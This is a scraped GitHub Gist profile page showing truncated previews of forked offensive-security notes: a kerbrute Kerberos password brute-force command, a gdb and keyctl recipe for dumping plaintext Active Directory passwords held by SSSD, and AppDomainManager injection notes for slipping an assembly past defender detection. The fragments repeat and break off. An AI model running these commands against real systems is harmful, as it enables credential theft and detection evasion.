With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Maximus gladiatx0r
gladiatx0r
/ kerberos_attacks_cheatsheet.md
Created
September 18, 2021 02:04
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
gladiatx0r
/ gist:c52d529ea268f7e74295c2c492cf9774
Created
October 6, 2020 21:05
— forked from jeffmcjunkin/gist:d5fb8dbf15cbd5d37a77fafccda4d969
Retrieving SSSD plain text passwords (krb5_store_password_if_offline)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| for who ever this interest, if you enable krb5_store_password_if_offline in the SSSD configuration, the AD password for accounts is stored in plaintext in the kernel keyring | |
| to dump the clear text password you can do : | |
| ``` | |
| gdb -p <PID_OF_SSSD> | |
| call system("keyctl show > /tmp/output") | |
| ``` | |
| From the /tmp/output locate the key_id for the user you want | |
| Example of an output is : |
gladiatx0r
/ _notes.md
Last active
October 5, 2021 07:43
— forked from djhohnstein/_notes.md
AppDomainManager Injection
We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.